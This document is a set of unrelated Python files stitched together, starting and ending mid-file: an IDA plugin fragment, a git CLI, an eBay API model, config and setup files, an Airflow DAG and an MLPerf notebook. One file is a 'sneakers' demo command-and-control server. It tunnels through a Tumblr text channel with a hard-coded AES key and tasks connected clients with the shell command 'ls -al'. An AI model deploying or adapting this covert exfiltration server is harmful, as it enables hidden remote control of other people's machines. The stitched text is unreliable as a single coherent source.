parent: parent node @param location: virtual address of basic block as seen by IDA """ super(CapaExplorerBlockItem, self).__init__(parent, [self.fmt % location, location_to_hex(location), ""]) class CapaExplorerDefaultItem(CapaExplorerDataItem): """store data for default match e.g. statement (and, or)""" def __init__(self, parent, display, details="", location=None): """initialize item @param parent: parent node @param display: text to display in UI @param details: text to display in details section of UI @param location: virtual address as seen by IDA """ location = location_to_hex(location) if location else "" super(CapaExplorerDefaultItem, self).__init__(parent, [display, location, details]) class CapaExplorerFeatureItem(CapaExplorerDataItem): """store data for feature match""" def __init__(self, parent, display, location="", details=""): """initialize item @param parent: parent node @param display: text to display in UI @param details: text to display in details section of UI @param location: virtual address as seen by IDA """ location = location_to_hex(location) if location else "" super(CapaExplorerFeatureItem, self).__init__(parent, [display, location, details]) class CapaExplorerInstructionViewItem(CapaExplorerFeatureItem): """store data for instruction match""" def __init__(self, parent, display, location): """initialize item details section shows disassembly view for match @param parent: parent node @param display: text to display in UI @param location: virtual address as seen by IDA """ details = capa.ida.helpers.get_disasm_line(location) super(CapaExplorerInstructionViewItem, self).__init__(parent, display, location=location, details=details) self.ida_highlight = idc.get_color(location, idc.CIC_ITEM) class CapaExplorerByteViewItem(CapaExplorerFeatureItem): """store data for byte match""" def __init__(self, parent, display, location): """initialize item details section shows byte preview for match @param parent: parent node @param display: text to display in UI @param location: virtual address as seen by IDA """ byte_snap = idaapi.get_bytes(location, 32) details = "" if byte_snap: byte_snap = codecs.encode(byte_snap, "hex").upper() details = " ".join([byte_snap[i : i + 2].decode() for i in range(0, len(byte_snap), 2)]) super(CapaExplorerByteViewItem, self).__init__(parent, display, location=location, details=details) self.ida_highlight = idc.get_color(location, idc.CIC_ITEM) class CapaExplorerStringViewItem(CapaExplorerFeatureItem): """store data for string match""" def __init__(self, parent, display, location, value): """initialize item @param parent: parent node @param display: text to display in UI @param location: virtual address as seen by IDA """ super(CapaExplorerStringViewItem, self).__init__(parent, display, location=location, details=value) self.ida_highlight = idc.get_color(location, idc.CIC_ITEM)
import threading import click from irekua_dev_tools.utils import check_app_name from .git import download_repository from .git import update_repository from .git import check_repository @click.group(name="git") @click.pass_context @click.option('--origin', '-o', default='origin') @click.option('--branch', '-b', default='master') @click.option('--method', '-m', default='http') def cli(ctx, origin, branch, method): """Commands to manage git repositories""" config = ctx.obj['config']['git'] ctx.obj['origin'] = config.get('origin', origin) ctx.obj['branch'] = config.get('branch', branch) ctx.obj['method'] = config.get('method', method) @cli.command() @click.pass_context @click.argument('name', type=str, required=False) @click.option('--force', '-f', is_flag=True) def download(ctx, name, force): """Download a single irekua/selia app repository""" target = ctx.obj['target'] method = ctx.obj['method'] repository_info = ctx.obj['repository_info'] if not name: ctx.invoke(download_all, force=force) else: check_app_name(name, repository_info) download_repository( name, target, repository_info, method=method, force=force) @cli.command() @click.pass_context @click.option('--force', '-f', is_flag=True) def download_all(ctx, force): """Download all irekua/selia app repositories""" target = ctx.obj['target'] method = ctx.obj['method'] repository_info = ctx.obj['repository_info'] for name in repository_info.keys(): download_repository( name, target, repository_info, method=method, force=force) @cli.command() @click.pass_context @click.argument('name', type=str, required=False) @click.option('--download', '-d', is_flag=True) def update(ctx, name, download): """Update a single irekua/selia app repository""" target = ctx.obj['target'] origin = ctx.obj['origin'] branch = ctx.obj['branch'] method = ctx.obj['method'] repository_info = ctx.obj['repository_info'] if not name: ctx.invoke(update_all, download=download) else: check_app_name(name, repository_info) update_repository( name, target, repository_info, branch=branch, origin=origin, method=method, download=download) @cli.command() @click.pass_context @click.option('--download', '-d', is_flag=True) def update_all(ctx, download): """Update all irekua/selia app repositories""" target = ctx.obj['target'] origin = ctx.obj['origin'] branch = ctx.obj['branch'] method = ctx.obj['method'] repository_info = ctx.obj['repository_info'] threads = [ threading.Thread( target=update_repository, args=[ name, target, repository_info, branch, origin, method, download]) for name in repository_info.keys()] for thread in threads: thread.start() for thread in threads: thread.join() @cli.command() @click.pass_context @click.argument('name', type=str, required=False) @click.option('--silent', '-s', is_flag=True) def check(ctx, name, silent): """Check the status of a single irekua/selia app repository""" target = ctx.obj['target'] origin = ctx.obj['origin'] branch = ctx.obj['branch'] repository_info = ctx.obj['repository_info'] if not name: ctx.invoke(check_all, silent=silent) else: check_app_name(name, repository_info) check_repository(name, target, silent=silent, origin=origin, branch=branch) @cli.command() @click.pass_context @click.option('--silent', '-s', is_flag=True) def check_all(ctx, silent): """Check the status of all irekua/selia app repository""" target = ctx.obj['target'] origin = ctx.obj['origin'] branch = ctx.obj['branch'] repository_info = ctx.obj['repository_info'] threads = [ threading.Thread( target=check_repository, args=[name, target, silent, origin, branch]) for name in repository_info.keys()] for thread in threads: thread.start() for thread in threads: thread.join()
import json from AddressFormatter.util import format import re from AddressFormatter.dataFromPincode import dataFromPincode def addressJSON(extractedAddress): with open('data.json', 'r') as dataJSON: dict = json.load(dataJSON) dict['extractedAddress'] = extractedAddress.replace('\n', ' ').replace('\f', '') with open('data.json', 'w') as dataJSON: json.dump(dict, dataJSON) addJSON={} pincode = re.findall("\d{6}", extractedAddress) if pincode!=[]: data = dataFromPincode(pincode[0])[0]['PostOffice'][0] addJSON={ "pin": pincode[0] } for i in data: if i=='District': addJSON['district']=data[i] addJSON['city']=data[i] elif i=='State': addJSON['state'] = data[i] formatAdd = format(extractedAddress, addJSON) return formatAdd
# coding: utf-8 """ Logistics API <span class=\"tablenote\"><b>Note:</b> This is a <a href=\"https://developer.ebay.com/api-docs/static/versioning.html#limited\" target=\"_blank\"> <img src=\"/cms/img/docs/partners-api.svg\" class=\"legend-icon partners-icon\" title=\"Limited Release\" alt=\"Limited Release\" />(Limited Release)</a> API available only to select developers approved by business units.</span><br /><br />The <b>Logistics API</b> resources offer the following capabilities: <ul><li><b>shipping_quote</b> &ndash; Consolidates into a list a set of live shipping rates, or quotes, from which you can select a rate to ship a package.</li> <li><b>shipment</b> &ndash; Creates a \"shipment\" for the selected shipping rate.</li></ul> Call <b>createShippingQuote</b> to get a list of live shipping rates. The rates returned are all valid for a specific time window and all quoted prices are at eBay-negotiated rates. <br><br>Select one of the live rates and using its associated <b>rateId</b>, create a \"shipment\" for the package by calling <b>createFromShippingQuote</b>. Creating a shipment completes an agreement, and the cost of the base service and any added shipping options are summed into the returned <b>totalShippingCost</b> value. This action also generates a shipping label that you can use to ship the package. The total cost of the shipment is incurred when the package is shipped using the supplied shipping label. <p class=\"tablenote\"><b>Important!</b> Sellers must set up a payment method via their eBay account before they can use the methods in this API to create a shipment and the associated shipping label.</p> # noqa: E501 OpenAPI spec version: v1_beta.0.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class PurchasedRate(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'additional_options': 'list[AdditionalOption]', 'base_shipping_cost': 'Amount', 'destination_time_zone': 'str', 'max_estimated_delivery_date': 'str', 'min_estimated_delivery_date': 'str', 'pickup_networks': 'list[str]', 'pickup_slot_id': 'str', 'pickup_type': 'str', 'rate_id': 'str', 'shipping_carrier_code': 'str', 'shipping_carrier_name': 'str', 'shipping_quote_id': 'str', 'shipping_service_code': 'str', 'shipping_service_name': 'str', 'total_shipping_cost': 'Amount' } attribute_map = { 'additional_options': 'additionalOptions', 'base_shipping_cost': 'baseShippingCost', 'destination_time_zone': 'destinationTimeZone', 'max_estimated_delivery_date': 'maxEstimatedDeliveryDate', 'min_estimated_delivery_date': 'minEstimatedDeliveryDate', 'pickup_networks': 'pickupNetworks', 'pickup_slot_id': 'pickupSlotId', 'pickup_type': 'pickupType', 'rate_id': 'rateId', 'shipping_carrier_code': 'shippingCarrierCode', 'shipping_carrier_name': 'shippingCarrierName', 'shipping_quote_id': 'shippingQuoteId', 'shipping_service_code': 'shippingServiceCode', 'shipping_service_name': 'shippingServiceName', 'total_shipping_cost': 'totalShippingCost' } def __init__(self, additional_options=None, base_shipping_cost=None, destination_time_zone=None, max_estimated_delivery_date=None, min_estimated_delivery_date=None, pickup_networks=None, pickup_slot_id=None, pickup_type=None, rate_id=None, shipping_carrier_code=None, shipping_carrier_name=None, shipping_quote_id=None, shipping_service_code=None, shipping_service_name=None, total_shipping_cost=None): # noqa: E501 """PurchasedRate - a model defined in Swagger""" # noqa: E501 self._additional_options = None self._base_shipping_cost = None self._destination_time_zone = None self._max_estimated_delivery_date = None self._min_estimated_delivery_date = None self._pickup_networks = None self._pickup_slot_id = None self._pickup_type = None self._rate_id = None self._shipping_carrier_code = None self._shipping_carrier_name = None self._shipping_quote_id = None self._shipping_service_code = None self._shipping_service_name = None self._total_shipping_cost = None self.discriminator = None if additional_options is not None: self.additional_options = additional_options if base_shipping_cost is not None: self.base_shipping_cost = base_shipping_cost if destination_time_zone is not None: self.destination_time_zone = destination_time_zone if max_estimated_delivery_date is not None: self.max_estimated_delivery_date = max_estimated_delivery_date if min_estimated_delivery_date is not None: self.min_estimated_delivery_date = min_estimated_delivery_date if pickup_networks is not None: self.pickup_networks = pickup_networks if pickup_slot_id is not None: self.pickup_slot_id = pickup_slot_id if pickup_type is not None: self.pickup_type = pickup_type if rate_id is not None: self.rate_id = rate_id if shipping_carrier_code is not None: self.shipping_carrier_code = shipping_carrier_code if shipping_carrier_name is not None: self.shipping_carrier_name = shipping_carrier_name if shipping_quote_id is not None: self.shipping_quote_id = shipping_quote_id if shipping_service_code is not None: self.shipping_service_code = shipping_service_code if shipping_service_name is not None: self.shipping_service_name = shipping_service_name if total_shipping_cost is not None: self.total_shipping_cost = total_shipping_cost @property def additional_options(self): """Gets the additional_options of this PurchasedRate. # noqa: E501 An list of additional, optional features that have been purchased for the shipment. # noqa: E501 :return: The additional_options of this PurchasedRate. # noqa: E501 :rtype: list[AdditionalOption] """ return self._additional_options @additional_options.setter def additional_options(self, additional_options): """Sets the additional_options of this PurchasedRate. An list of additional, optional features that have been purchased for the shipment. # noqa: E501 :param additional_options: The additional_options of this PurchasedRate. # noqa: E501 :type: list[AdditionalOption] """ self._additional_options = additional_options @property def base_shipping_cost(self): """Gets the base_shipping_cost of this PurchasedRate. # noqa: E501 :return: The base_shipping_cost of this PurchasedRate. # noqa: E501 :rtype: Amount """ return self._base_shipping_cost @base_shipping_cost.setter def base_shipping_cost(self, base_shipping_cost): """Sets the base_shipping_cost of this PurchasedRate. :param base_shipping_cost: The base_shipping_cost of this PurchasedRate. # noqa: E501 :type: Amount """ self._base_shipping_cost = base_shipping_cost @property def destination_time_zone(self): """Gets the destination_time_zone of this PurchasedRate. # noqa: E501 The time zone of the destination according to Time Zone Database. For example, &quot;America/Los_Angeles&quot;. # noqa: E501 :return: The destination_time_zone of this PurchasedRate. # noqa: E501 :rtype: str """ return self._destination_time_zone @destination_time_zone.setter def destination_time_zone(self, destination_time_zone): """Sets the destination_time_zone of this PurchasedRate. The time zone of the destination according to Time Zone Database. For example, &quot;America/Los_Angeles&quot;. # noqa: E501 :param destination_time_zone: The destination_time_zone of this PurchasedRate. # noqa: E501 :type: str """ self._destination_time_zone = destination_time_zone @property def max_estimated_delivery_date(self): """Gets the max_estimated_delivery_date of this PurchasedRate. # noqa: E501 A string value representing maximum (latest) estimated delivery time, formatted as an ISO 8601 string, which is based on the 24-hour Coordinated Universal Time (UTC) clock. Format: [YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].[SSS]Z Example: 2018-08-20T07:09:00.000Z # noqa: E501 :return: The max_estimated_delivery_date of this PurchasedRate. # noqa: E501 :rtype: str """ return self._max_estimated_delivery_date @max_estimated_delivery_date.setter def max_estimated_delivery_date(self, max_estimated_delivery_date): """Sets the max_estimated_delivery_date of this PurchasedRate. A string value representing maximum (latest) estimated delivery time, formatted as an ISO 8601 string, which is based on the 24-hour Coordinated Universal Time (UTC) clock. Format: [YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].[SSS]Z Example: 2018-08-20T07:09:00.000Z # noqa: E501 :param max_estimated_delivery_date: The max_estimated_delivery_date of this PurchasedRate. # noqa: E501 :type: str """ self._max_estimated_delivery_date = max_estimated_delivery_date @property def min_estimated_delivery_date(self): """Gets the min_estimated_delivery_date of this PurchasedRate. # noqa: E501 A string value representing minimum (earliest) estimated delivery time, formatted as an ISO 8601ISO 8601 UTC string. # noqa: E501 :return: The min_estimated_delivery_date of this PurchasedRate. # noqa: E501 :rtype: str """ return self._min_estimated_delivery_date @min_estimated_delivery_date.setter def min_estimated_delivery_date(self, min_estimated_delivery_date): """Sets the min_estimated_delivery_date of this PurchasedRate. A string value representing minimum (earliest) estimated delivery time, formatted as an ISO 8601ISO 8601 UTC string. # noqa: E501 :param min_estimated_delivery_date: The min_estimated_delivery_date of this PurchasedRate. # noqa: E501 :type: str """ self._min_estimated_delivery_date = min_estimated_delivery_date @property def pickup_networks(self): """Gets the pickup_networks of this PurchasedRate. # noqa: E501 A list of pickup networks compatible with the shipping service. # noqa: E501 :return: The pickup_networks of this PurchasedRate. # noqa: E501 :rtype: list[str] """ return self._pickup_networks @pickup_networks.setter def pickup_networks(self, pickup_networks): """Sets the pickup_networks of this PurchasedRate. A list of pickup networks compatible with the shipping service. # noqa: E501 :param pickup_networks: The pickup_networks of this PurchasedRate. # noqa: E501 :type: list[str] """ self._pickup_networks = pickup_networks @property def pickup_slot_id(self): """Gets the pickup_slot_id of this PurchasedRate. # noqa: E501 This unique eBay-assigned ID value is returned only if the shipment has been configured for a scheduled pickup. # noqa: E501 :return: The pickup_slot_id of this PurchasedRate. # noqa: E501 :rtype: str """ return self._pickup_slot_id @pickup_slot_id.setter def pickup_slot_id(self, pickup_slot_id): """Sets the pickup_slot_id of this PurchasedRate. This unique eBay-assigned ID value is returned only if the shipment has been configured for a scheduled pickup. # noqa: E501 :param pickup_slot_id: The pickup_slot_id of this PurchasedRate. # noqa: E501 :type: str """ self._pickup_slot_id = pickup_slot_id @property def pickup_type(self): """Gets the pickup_type of this PurchasedRate. # noqa: E501 The type of pickup or drop off configured for the shipment. For implementation help, refer to <a href='https://developer.ebay.com/api-docs/sell/logistics/types/api:PickupTypeEnum'>eBay API documentation</a> # noqa: E501 :return: The pickup_type of this PurchasedRate. # noqa: E501 :rtype: str """ return self._pickup_type @pickup_type.setter def pickup_type(self, pickup_type): """Sets the pickup_type of this PurchasedRate. The type of pickup or drop off configured for the shipment. For implementation help, refer to <a href='https://developer.ebay.com/api-docs/sell/logistics/types/api:PickupTypeEnum'>eBay API documentation</a> # noqa: E501 :param pickup_type: The pickup_type of this PurchasedRate. # noqa: E501 :type: str """ self._pickup_type = pickup_type @property def rate_id(self): """Gets the rate_id of this PurchasedRate. # noqa: E501 The eBay-generated ID of the shipping rate that the seller has chosen to purchase for the shipment. # noqa: E501 :return: The rate_id of this PurchasedRate. # noqa: E501 :rtype: str """ return self._rate_id @rate_id.setter def rate_id(self, rate_id): """Sets the rate_id of this PurchasedRate. The eBay-generated ID of the shipping rate that the seller has chosen to purchase for the shipment. # noqa: E501 :param rate_id: The rate_id of this PurchasedRate. # noqa: E501 :type: str """ self._rate_id = rate_id @property def shipping_carrier_code(self): """Gets the shipping_carrier_code of this PurchasedRate. # noqa: E501 The ID code for the carrier that was selected for the package shipment. # noqa: E501 :return: The shipping_carrier_code of this PurchasedRate. # noqa: E501 :rtype: str """ return self._shipping_carrier_code @shipping_carrier_code.setter def shipping_carrier_code(self, shipping_carrier_code): """Sets the shipping_carrier_code of this PurchasedRate. The ID code for the carrier that was selected for the package shipment. # noqa: E501 :param shipping_carrier_code: The shipping_carrier_code of this PurchasedRate. # noqa: E501 :type: str """ self._shipping_carrier_code = shipping_carrier_code @property def shipping_carrier_name(self): """Gets the shipping_carrier_name of this PurchasedRate. # noqa: E501 The name of the shipping carrier. # noqa: E501 :return: The shipping_carrier_name of this PurchasedRate. # noqa: E501 :rtype: str """ return self._shipping_carrier_name @shipping_carrier_name.setter def shipping_carrier_name(self, shipping_carrier_name): """Sets the shipping_carrier_name of this PurchasedRate. The name of the shipping carrier. # noqa: E501 :param shipping_carrier_name: The shipping_carrier_name of this PurchasedRate. # noqa: E501 :type: str """ self._shipping_carrier_name = shipping_carrier_name @property def shipping_quote_id(self): """Gets the shipping_quote_id of this PurchasedRate. # noqa: E501 The unique eBay-generated ID of the shipping quote from which the seller selected a shipping rate (rateId). # noqa: E501 :return: The shipping_quote_id of this PurchasedRate. # noqa: E501 :rtype: str """ return self._shipping_quote_id @shipping_quote_id.setter def shipping_quote_id(self, shipping_quote_id): """Sets the shipping_quote_id of this PurchasedRate. The unique eBay-generated ID of the shipping quote from which the seller selected a shipping rate (rateId). # noqa: E501 :param shipping_quote_id: The shipping_quote_id of this PurchasedRate. # noqa: E501 :type: str """ self._shipping_quote_id = shipping_quote_id @property def shipping_service_code(self): """Gets the shipping_service_code of this PurchasedRate. # noqa: E501 String ID code for the shipping service selected for the package shipment. This is a service that the shipping carrier supplies. # noqa: E501 :return: The shipping_service_code of this PurchasedRate. # noqa: E501 :rtype: str """ return self._shipping_service_code @shipping_service_code.setter def shipping_service_code(self, shipping_service_code): """Sets the shipping_service_code of this PurchasedRate. String ID code for the shipping service selected for the package shipment. This is a service that the shipping carrier supplies. # noqa: E501 :param shipping_service_code: The shipping_service_code of this PurchasedRate. # noqa: E501 :type: str """ self._shipping_service_code = shipping_service_code @property def shipping_service_name(self): """Gets the shipping_service_name of this PurchasedRate. # noqa: E501 The name of the shipping service. # noqa: E501 :return: The shipping_service_name of this PurchasedRate. # noqa: E501 :rtype: str """ return self._shipping_service_name @shipping_service_name.setter def shipping_service_name(self, shipping_service_name): """Sets the shipping_service_name of this PurchasedRate. The name of the shipping service. # noqa: E501 :param shipping_service_name: The shipping_service_name of this PurchasedRate. # noqa: E501 :type: str """ self._shipping_service_name = shipping_service_name @property def total_shipping_cost(self): """Gets the total_shipping_cost of this PurchasedRate. # noqa: E501 :return: The total_shipping_cost of this PurchasedRate. # noqa: E501 :rtype: Amount """ return self._total_shipping_cost @total_shipping_cost.setter def total_shipping_cost(self, total_shipping_cost): """Sets the total_shipping_cost of this PurchasedRate. :param total_shipping_cost: The total_shipping_cost of this PurchasedRate. # noqa: E501 :type: Amount """ self._total_shipping_cost = total_shipping_cost def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(PurchasedRate, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, PurchasedRate): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
""" Define functions, classes, and constants that are exposed to the client, enabling calls to fables.* . """ from fables.api import detect, parse from fables.tree import ( StreamManager, FileNode, MimeTypeFileNode, Directory, Zip, Csv, Xls, Xlsx, Xlsb, Skip, mimetype_from_stream, mimetype_and_extension, ) from fables.table import Table from fables.errors import ParseError, ExtractError from fables.constants import OS_PATTERNS_TO_SKIP, MAX_FILE_SIZE __all__ = [ "detect", "parse", "StreamManager", "FileNode", "MimeTypeFileNode", "Directory", "Zip", "Csv", "Xls", "Xlsx", "Xlsb", "Skip", "mimetype_from_stream", "mimetype_and_extension", "Table", "ParseError", "ExtractError", "OS_PATTERNS_TO_SKIP", "MAX_FILE_SIZE", ] # Note: When changing version also be sure to change the version in setup.py __version__ = "1.2.5"
import FWCore.ParameterSet.Config as cms # Module to create simulated GEM-CSC trigger pad digis. simMuonGEMPadDigis = cms.EDProducer("GEMPadDigiProducer", InputCollection = cms.InputTag('simMuonGEMDigis'), ) from Configuration.Eras.Modifier_phase2_muon_cff import phase2_muon from Configuration.ProcessModifiers.premix_stage2_cff import premix_stage2 (premix_stage2 & phase2_muon).toModify(simMuonGEMPadDigis, InputCollection = "mixData")
""" A simple demo server. It waits to receive connections from a client, then instructs that client to run `ls -al`, waits for the results, and prints them. Should work with multiple clients but honestly anything more than what I described above is untested. """ import json import random import string from time import sleep from sneakers import Exfil mod = "tumblr_text" with open('sneakers/config/{}_config.json'.format(mod), 'rb') as f: file_data = f.read() params = json.loads(file_data) enc = ['aes'] t = Exfil(mod, enc) aes_params = {'key': 'apassword'} t.set_encoder_params('aes', {'sending': aes_params, 'receiving': aes_params}) t.set_channel_params({'sending': params, 'receiving': params}) clients = {} def make_fragment_id(): return ''.join(random.choice(string.ascii_letters + string.digits) for i in range(20)) def make_client_id(): return ''.join(random.choice(string.ascii_letters + string.digits) for i in range(8)) def get_client_for_fragment(packet): send_fragment = packet.split('|')[0] new_fragment = packet.split('|')[-1] client_id = filter(lambda c: clients[c]['current_fragment_id'] == send_fragment, clients) try: client_id = client_id[0] except IndexError: # no client found! return None # update the client with the new fragment id to use for them clients[client_id]['current_fragment_id'] = new_fragment # since we got something from the client, they are just waiting for us now # (therefore we are ready to send to them at any time) clients[client_id]['waiting'] = True return client_id def send_packet_to_client(client_id, payload): """ Given a payload, wraps it in the proper fragment_id fields and sends it off """ # update to note that we have sent to the client and it is no longer # just waiting around to get a packet - it has been tasked and is busy clients[client_id]['waiting'] = False fragment_id = clients[client_id]['current_fragment_id'] new_fragment_id = make_fragment_id() clients[client_id]['current_fragment_id'] = new_fragment_id packet = '{}|{}|{}'.format(fragment_id, payload, new_fragment_id) t.send(packet) def handle_packet(packet): tokens = packet.split('|') if tokens[1] == "connected": if tokens[0] in [clients[c]['initial_fragment_id'] for c in clients]: # we've already seen this one return print("New client connected!") client_id = make_client_id() clients[client_id] = { 'initial_fragment_id': tokens[0], 'current_fragment_id': tokens[-1], 'waiting': True # is the client ready for a new packet? } # task the client right away send_packet_to_client(client_id, "shell|ls -al") # now check to see if we have a thread going; "connected" is a special case client_id = get_client_for_fragment(packet) if client_id is None: # no client found! ignore. return # now process our packet (since we know who it came from) if tokens[1] == "result": print("Got a result:") print(packet) while True: for packet in t.receive(): handle_packet(packet) print("Clients:") print(clients) print("") sleep(15)
import setuptools with open("README.md", "r") as fh: long_description = fh.read() setuptools.setup( name="pystardog", version="0.9.7", author="Stardog Union", author_email="support@stardog.com", description="Use Stardog with Python!", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/stardog-union/pystardog", packages=setuptools.find_packages(), classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent", ], install_requires=[ 'requests>=2.22.0', 'requests-toolbelt>=0.9.1', 'contextlib2>=0.5.5', ], setup_requires=['pytest-runner'], tests_require=['pytest'], )
from __future__ import print_function from bitcoinetl.build_export_dag import build_export_dag from bitcoinetl.variables import read_export_dag_vars # When searching for DAGs, Airflow will only consider files where the string "airflow" and "DAG" both appear in the # contents of the .py file. DAG = build_export_dag( dag_id='zcash_export_dag', chain='zcash', **read_export_dag_vars( var_prefix='zcash_', export_schedule_interval='0 16 * * *', export_start_date='2016-10-28', export_max_workers=3, export_batch_size=1, ) )
#!/usr/bin/env python # coding: utf-8 # # Generate [dividiti](http://dividiti.com)'s submissions to [MLPerf Inference v0.5](https://github.com/mlperf/inference/tree/master/v0.5) # <a id="overview"></a> # ## Overview # This Jupyter notebook covers [dividiti](http://dividiti.com)'s submissions to [MLPerf Inference v0.5](https://github.com/mlperf/inference/tree/master/v0.5). It validates that experimental data obtained via automated, portable and reproducible [Collective Knowledge](http://cknowledge.org) workflows conforms to [General MLPerf Submission Rules](https://github.com/mlperf/policies/blob/master/submission_rules.adoc) # and [MLPerf Inference Rules](https://github.com/mlperf/inference_policies/blob/master/inference_rules.adoc), including runnning the official [`submission_checker.py`](https://github.com/mlperf/inference/blob/master/v0.5/tools/submission/submission-checker.py). # A live version of this Jupyter Notebook can be viewed [here](https://nbviewer.jupyter.org/urls/dl.dropbox.com/s/1xlv5oacgobrfd4/mlperf-inference-v0.5-dividiti.ipynb). # ## Table of Contents # 1. [Overview](#overview) # 1. [Includes](#includes) # 1. [System templates](#templates) # 1. [Firefly RK3399](#templates_firefly) # 1. [Linaro HiKey960](#templates_hikey960) # 1. [Huawei Mate 10 Pro](#templates_mate10pro) # 1. [Raspberry Pi 4](#templates_rpi4) # 1. [HP Z640](#templates_velociti) # 1. [Default](#templates_default) # 1. [Systems](#systems) # 1. [Implementations](#implementations) # 1. [Get the experimental data](#get) # 1. [Image Classification - Closed](#get_image_classification_closed) # 1. [Image Classification - Open](#get_image_classification_open) # 1. [Object Detection - Open](#get_object_detection_open) # 1. [Generate the submission checklist](#checklist) # 1. [Check the experimental data](#check) # <a id="includes"></a> # ## Includes # ### Standard # In[ ]: import os import sys import json import re from pprint import pprint from shutil import copy2 from copy import deepcopy # ### Scientific # If some of the scientific packages are missing, please install them using: # ``` # # python3 -m pip install jupyter pandas numpy matplotlib seaborn --user # ``` # In[ ]: import IPython as ip import pandas as pd import numpy as np print ('IPython version: %s' % ip.__version__) print ('Pandas version: %s' % pd.__version__) print ('NumPy version: %s' % np.__version__) # No need to hardcode e.g. as: # sys.path.append('$CK_TOOLS/tool-coco-master-gcc-8.3.0-compiler.python-3.6.10-linux-64/') # since it gets added to the Python path automatically via the dependency. from pycocotools.coco import COCO # No need to hardcode (e.g. as '$CK_TOOLS/dataset-coco-2017-val'), # since it gets added to the path automatically via the dependency. coco_dir = os.environ.get('CK_ENV_DATASET_COCO','') if coco_dir=='': print('Error: Path to COCO dataset not defined!') exit(1) # No need to hardcode (e.g. as '$CK_TOOLS/dataset-imagenet-ilsvrc2012-aux/val.txt'), # since it gets added to the path automatically via the dependency. imagenet_val_file = os.environ.get('CK_CAFFE_IMAGENET_VAL_TXT','') if imagenet_val_file=='': print('Error: Path to ImageNet labels not defined!') exit(1) # ### Collective Knowledge # If CK is not installed, please install it using: # ``` # # python -m pip install ck # ``` # In[ ]: import ck.kernel as ck print ('CK version: %s' % ck.__version__) # <a id="templates"></a> # ## System templates # <a id="templates_firefly"></a> # ### [Firefly-RK3399](http://en.t-firefly.com/product/rk3399/) # In[ ]: firefly = { "division": "", "submitter": "dividiti", "status": "available", "system_name": "Firefly-RK3399 (firefly)", "number_of_nodes": "1", "host_processor_model_name": "Arm Cortex-A72 MP2 (big); Arm Cortex-A53 MP4 (LITTLE)", "host_processors_per_node": "1", "host_processor_core_count": "2 (big); 4 (LITTLE)", "host_processor_frequency": "1800 MHz (big), 1400 MHz (LITTLE)", "host_processor_caches": "L1I$ 48 KiB, L1D$ 32 KiB, L2$ 1 MiB (big); L1I$ 32 KiB, L1D$ 32 KiB, L2$ 512 KiB (LITTLE)", "host_memory_configuration": "-", "host_memory_capacity": "4 GiB", "host_storage_capacity": "128 GiB", "host_storage_type": "SanDisk Extreme microSD", "host_processor_interconnect": "-", "host_networking": "-", "host_networking_topology": "-", "accelerators_per_node": "1", "accelerator_model_name": "Arm Mali-T860 MP4", "accelerator_frequency": "800 MHz", "accelerator_host_interconnect": "-", "accelerator_interconnect": "-", "accelerator_interconnect_topology": "-", "accelerator_memory_capacity": "4 GiB (shared with host)", "accelerator_memory_configuration": "-", "accelerator_on-chip_memories": "-", "cooling": "on-board fan", "hw_notes": "http://en.t-firefly.com/product/rk3399/; http://opensource.rock-chips.com/wiki_RK3399", "framework": "", "operating_system": "Ubuntu 16.04.6 LTS; kernel 4.4.77 #554 (Thu Nov 30 11:30:11 HKT 2017)", "other_software_stack": "GCC 7.4.0; Python 3.5.2; OpenCL driver 1.2 v1.r13p0-00rel0-git(a4271c9).31ba04af2d3c01618138bef3aed66c2c", "sw_notes": "Powered by Collective Knowledge v1.11.1" } # <a id="templates_hikey960"></a> # ### [Linaro HiKey960](https://www.96boards.org/product/hikey960/) # In[ ]: hikey960 = { "division": "", "submitter": "dividiti", "status": "available", "system_name": "Linaro HiKey960 (hikey960)", "number_of_nodes": "1", "host_processor_model_name": "Arm Cortex-A73 MP4 (big); Arm Cortex-A53 MP4 (LITTLE)", "host_processors_per_node": "1", "host_processor_core_count": "4 (big); 4 (LITTLE)", "host_processor_frequency": "2362 MHz (big), 1844 MHz (LITTLE)", "host_processor_caches": "L1I$ 256=4x64 KiB, L1D$ 256=4x64 KiB, L2$ 2 MiB (big); L1I$ 128=4x32 KiB, L1D$ 128=4x32 KiB, L2$ 1 MiB (LITTLE)", "host_memory_configuration": "-", "host_memory_capacity": "3 GiB", "host_storage_capacity": "128 GiB", "host_storage_type": "SanDisk Extreme microSD", "host_processor_interconnect": "-", "host_networking": "-", "host_networking_topology": "-", "accelerators_per_node": "1", "accelerator_model_name": "Arm Mali-G71 MP8", "accelerator_frequency": "800 MHz", "accelerator_host_interconnect": "-", "accelerator_interconnect": "-", "accelerator_interconnect_topology": "-", "accelerator_memory_capacity": "3 GiB (shared with host)", "accelerator_memory_configuration": "-", "accelerator_on-chip_memories": "-", "cooling": "small external fan", "hw_notes": "http://www.hisilicon.com/en/Products/ProductList/Kirin", "framework": "", "operating_system": "Debian 9; kernel 4.19.5-hikey #26 (Thu Aug 22 07:58:35 UTC 2019)", "other_software_stack": "GCC 7.4.0; Python 3.5.3; OpenCL driver 2.0 v1.r16p0", "sw_notes": "Powered by Collective Knowledge v1.11.1" } # <a id="templates_mate10pro"></a> # ### Huawei Mate 10 Pro # In[ ]: mate10pro = { "division": "", "submitter": "dividiti", "status": "available", "system_name": "Huawei Mate 10 Pro (mate10pro)", "number_of_nodes": "1", "host_processor_model_name": "Arm Cortex-A73 